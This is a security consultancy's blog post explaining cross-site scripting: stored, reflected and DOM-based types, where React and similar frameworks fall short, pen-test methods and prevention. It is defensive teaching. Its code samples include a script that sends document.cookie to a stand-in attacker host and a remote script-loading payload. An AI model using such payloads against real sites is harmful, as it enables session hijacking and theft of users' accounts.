Kuboid Secure Layer
February 27, 2026 · Vinay Kumar · XSS

Cross-Site Scripting (XSS) Explained — Why It's Still Dangerous in 2026



TLDR: A comment on a product review page. An innocent-looking text field. But the developer hadn't encoded the output. The "comment" was a JavaScript payload — and every user who loaded that product page had their session cookie silently forwarded to an attacker's server. 2,400 users over 6 days before it was discovered. XSS has been in the OWASP Top 10 for over two decades. Modern frameworks reduced its frequency — they didn't eliminate it. Here's how it still works, where modern protections fall short, and what to do about it.


What XSS Is — And Why It's Still Relevant

Cross-Site Scripting (XSS) occurs when an application takes untrusted input — from a user, a URL parameter, a database field — and renders it in a browser without properly encoding it. The result: the browser executes attacker-controlled JavaScript in the context of your application, with access to everything your JavaScript legitimately has access to — cookies, session tokens, the DOM, the ability to make authenticated requests.

The reason it persists after 25 years is the same reason most web vulnerabilities persist: it's a consequence of how the web was built. Browsers execute JavaScript. Applications render dynamic content. The gap between "render this content" and "execute this content" is narrow, and closing it requires consistent, correct output encoding at every point where dynamic data touches HTML, JavaScript, or URLs. One missed location is enough.

Despite frameworks improving the baseline, XSS consistently appears in Verizon's and OWASP's research as a top-five finding in web application assessments. It appears regularly in bug bounty programmes at major companies. And it appeared in our review last quarter in an application built entirely on React — a framework that encodes output by default precisely to prevent it.


Three Types of XSS, With Real Examples

Stored XSS is the most dangerous variant. The malicious payload is submitted through user input, stored in the application's database, and then rendered for every subsequent user who views that content. The comment field example from the opening hook is stored XSS — one submission, thousands of victims, no further attacker interaction required.

A real-world illustration: imagine a support ticket system where the description field isn't properly encoded. An attacker submits a ticket with a JavaScript payload in the description. Every support agent who opens that ticket executes the script — potentially giving an attacker session tokens for accounts with admin-level access.
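The fix at the rendering layer is output encoding. Here is a minimal sketch in plain JavaScript — the `escapeHtml` helper and the ticket description are illustrative, and a real application should rely on a vetted library or its framework's default encoding rather than a hand-rolled function:

```javascript
// Hypothetical minimal HTML-encoding helper — the output-encoding step
// the vulnerable ticket system skipped.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A stored payload like the one described above:
const description = '<script>new Image().src="//attacker.example/c?"+document.cookie</script>';

// Encoded before rendering, it becomes inert text the browser displays but never runs:
const rendered = '<div class="ticket-description">' + escapeHtml(description) + '</div>';
console.log(rendered);
```

The angle brackets become `&lt;` and `&gt;`, so the browser shows the "script" as literal text instead of parsing it as a tag.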

Reflected XSS doesn't persist — the payload is embedded in a URL and reflected back to whoever clicks that URL. A search page that displays "You searched for: [query]" without encoding the query value is a classic candidate. An attacker crafts a malicious URL, distributes it via phishing or social media, and every user who clicks it executes the payload in their session.

The impact is scoped to whoever clicks the link — but combined with a targeted phishing campaign, reflected XSS against a high-value user (a finance manager, an admin) can be highly effective.
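To make the pattern concrete, here is a sketch of the vulnerable handler shape — the function, domain, and payload are illustrative, not taken from a real application:

```javascript
// Illustrative reflected-XSS shape: the query parameter flows straight
// into the response HTML with no encoding.
function renderSearchPage(query) {
  return '<h1>You searched for: ' + query + '</h1>'; // unencoded reflection
}

// An attacker-crafted link (shown unencoded for readability):
//   https://example.com/search?q=<script src=//attacker.example/x.js></script>
const payload = '<script src=//attacker.example/x.js></script>';

// The script tag lands verbatim in the victim's page:
console.log(renderSearchPage(payload));
```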

DOM-based XSS is the subtlest variant and the one modern developers most commonly miss. The payload never reaches the server — it's processed entirely in the browser by JavaScript that reads from attacker-controlled sources (URL fragments, window.location, document.referrer) and writes to dangerous sinks (innerHTML, document.write, eval). Server-side protections and WAF rules don't see it because it never passes through the server.

// Vulnerable — reads from URL hash, writes to innerHTML
const search = location.hash.substring(1);
document.getElementById('results').innerHTML = 'Results for: ' + search;

// URL: https://example.com/search#<img src=x onerror=alert(1)>
// The browser executes the onerror handler — server saw nothing
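The sink-side fix is to write untrusted values through an API that never parses HTML. A sketch of the same feature done safely — the helper name and element wiring are illustrative:

```javascript
// Safe counterpart: textContent creates a text node, so any markup in the
// hash is displayed as text, never executed.
function renderResults(el, rawHash) {
  const search = decodeURIComponent(rawHash.replace(/^#/, ''));
  el.textContent = 'Results for: ' + search;
}

// In the page: renderResults(document.getElementById('results'), location.hash);
```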

What Attackers Actually Do With XSS

Cookie theft for session hijacking is the classic exploit — a script that reads document.cookie and sends it to an attacker-controlled server. The attacker loads that cookie in their own browser and is immediately authenticated as the victim, no password required. This is the mechanism behind the 2,400-user incident in the opening hook.

Beyond session theft, a persistent XSS payload on a heavily trafficked page gives an attacker a JavaScript execution context in thousands of browsers simultaneously. They can: redirect users to credential phishing pages that look identical to your login form; inject fake form fields that harvest passwords as users type; load external scripts that install browser-based cryptominers; modify page content for defacement or disinformation; or make authenticated API requests on behalf of the victim — silently, invisibly, from within the trusted origin of your own application.

The last one deserves emphasis: because XSS executes in the context of your domain, it bypasses same-origin policy. An XSS payload can call your authenticated API endpoints as the victim, with the victim's credentials, and the server has no way to distinguish these requests from legitimate ones.


Why Modern Frameworks Help But Don't Fully Protect You

React, Vue, and Angular all perform automatic output encoding by default when you render variables into templates. {userInput} in React is rendered as text, not HTML — angle brackets become &lt; and &gt;, breaking any injected HTML or script tags. This eliminates the majority of XSS vectors in a correctly written component.

The gaps:

dangerouslySetInnerHTML in React. The name is a warning. Developers use it when they need to render HTML content — rich text from a CMS, formatted content from a database. When that content contains untrusted user data and hasn't been sanitised before rendering, XSS is the result. I find this pattern regularly in applications where rich text editing is a feature.

innerHTML, outerHTML, and document.write in vanilla JavaScript or jQuery that still ships inside modern applications. In most real codebases, framework components exist alongside legacy JavaScript.

Template literals and string concatenation in JavaScript that construct HTML strings and insert them into the DOM rather than using framework-managed rendering.

Server-side rendering with unencoded output — any server-side template that concatenates user data into HTML without encoding (Jinja2, EJS, Handlebars) is vulnerable regardless of what the frontend framework is doing.

A React frontend doesn't protect a Node.js/EJS server-side rendering layer or a legacy jQuery component that's still present in the codebase.
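In EJS, for instance, the difference between encoded and raw output is a single character (the `query` variable is illustrative):

```ejs
<%# Escaped output — angle brackets in query become entities: %>
<p>You searched for: <%= query %></p>

<%# Raw output — renders query as HTML; XSS if query is untrusted: %>
<p>You searched for: <%- query %></p>
```

Jinja2 and Handlebars have the same split: their default output tags escape, and a separate raw/safe syntax bypasses that escaping.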


How I Test for XSS During a Pen Test

The manual technique is straightforward to describe — though systematic application takes time.

Every input field, URL parameter, HTTP header, and form element that might be reflected back to the page is a candidate. I start with a canary value — a unique, obviously fake string like xss-test-7f3a — submitted to each input. Then I search the rendered HTML for where that value appears and in what context: inside an HTML attribute, between HTML tags, inside a JavaScript string, inside a URL.

The context determines the payload. An injection inside an HTML attribute needs a different payload than one between tags or inside a JavaScript string. The goal isn't to trigger alert(1) — it's to understand the injection context and demonstrate that JavaScript execution is achievable.
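The first part of that context check can be mechanised. A toy sketch — not a scanner, and real injection contexts need careful manual analysis beyond what a heuristic like this can see:

```javascript
// Toy classifier for the canary step: locate the canary in the rendered
// HTML and report a rough injection context.
function canaryContext(html, canary) {
  const i = html.indexOf(canary);
  if (i === -1) return 'not reflected';
  const before = html.slice(0, i);
  // Inside an open <script> block?
  if (before.lastIndexOf('<script') > before.lastIndexOf('</script')) return 'script context';
  // Inside a quoted attribute value?
  if (/=\s*"[^"]*$/.test(before) || /=\s*'[^']*$/.test(before)) return 'attribute value';
  return 'html text';
}

console.log(canaryContext('<p>You searched for: xss-test-7f3a</p>', 'xss-test-7f3a'));
// prints: html text
```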

For DOM XSS specifically: I review the JavaScript source for dangerous sinks (innerHTML, eval, setTimeout with string arguments) and trace back whether any of them receive data from attacker-controllable sources. This is where automated scanners frequently miss findings — DOM XSS requires code-reading, not just HTTP traffic analysis.


How to Prevent XSS

Output encoding everywhere, consistently. Every place where dynamic data is rendered into HTML, JavaScript, or URL contexts must encode that data appropriately for that context. HTML encoding, JavaScript encoding, and URL encoding are distinct — a value correctly encoded for HTML is not necessarily safe in a JavaScript string context.

Content Security Policy (CSP). A properly configured CSP header instructs the browser to only execute JavaScript from trusted sources, blocking inline script execution and external script loads from unrecognised domains. CSP doesn't prevent XSS from occurring — it limits what a successful XSS payload can do. It's a defence-in-depth measure, not a replacement for correct encoding. Test your CSP configuration at csp-evaluator.withgoogle.com.
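An illustrative starting policy — the values are examples, the nonce must be freshly generated per response, and a real policy needs tuning against the origins your application actually loads from:

```
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-rAnd0m123'; object-src 'none'; base-uri 'none'
```

With this in place, an injected inline `<script>` tag is blocked unless it carries the current nonce, and external scripts can only load from your own origin.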

Use framework rendering correctly. In React, never use dangerouslySetInnerHTML with untrusted content. If you must render HTML from a database or CMS, sanitise it server-side with a library like DOMPurify before storing or rendering it.
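A sketch of that sanitisation step using DOMPurify's `sanitize()` API — the allowlist shown is illustrative, and should be tuned to the markup your CMS actually produces:

```javascript
import DOMPurify from 'dompurify';

// Untrusted rich text from a CMS or database (name illustrative):
const dirty = article.bodyHtml;

// Strip everything outside an explicit allowlist:
const clean = DOMPurify.sanitize(dirty, {
  ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li'],
  ALLOWED_ATTR: ['href'],
});

// Only the sanitised value should ever reach dangerouslySetInnerHTML:
// <div dangerouslySetInnerHTML={{ __html: clean }} />
```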

Audit uses of innerHTML and equivalent sinks. Run grep -r "innerHTML\|outerHTML\|document\.write\|eval(" ./src across your codebase and review each occurrence. Most will be legitimate — a few will be accepting untrusted data.

Set the HttpOnly flag on session cookies. This doesn't prevent XSS — it prevents the most common XSS exploit. A session cookie with HttpOnly cannot be read by JavaScript, so cookie theft via document.cookie is blocked. This is a one-line configuration change that meaningfully limits XSS impact.
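On the wire, the flag is one token in the Set-Cookie header (cookie name and value illustrative; Secure and SameSite are worth setting at the same time):

```
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
```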


Is Your Output Encoding Solid?

The challenge with XSS is scale — a large application has hundreds of input surfaces, and every single one needs to handle untrusted data correctly. One missed location, one legacy component, one dangerouslySetInnerHTML accepting the wrong input, is enough.

A focused XSS assessment maps every injection surface in your application and tests each one systematically — including DOM-based variants that automated scanners miss. If you want to verify your output encoding is consistent across your entire application, get in touch and we'll scope what that review looks like for your stack.

You can explore our full services, read more about how we work, or browse more technical guides on the Kuboid blog.


Kuboid Secure Layer provides web application security assessments for product teams and startups. Visit www.kuboid.in to learn more.

Vinay Kumar
Security Researcher @ Kuboid
Get In Touch

Let's find your vulnerabilities before they do.

Tell us about your product and we'll tell you what we'd attack first. Free consultation, no commitment.

  • 📧 support@kuboid.in
  • ⏱️ Typical response within 24 hours
  • 🌍 Serving clients globally from India
  • 🔒 NDA available before any discussion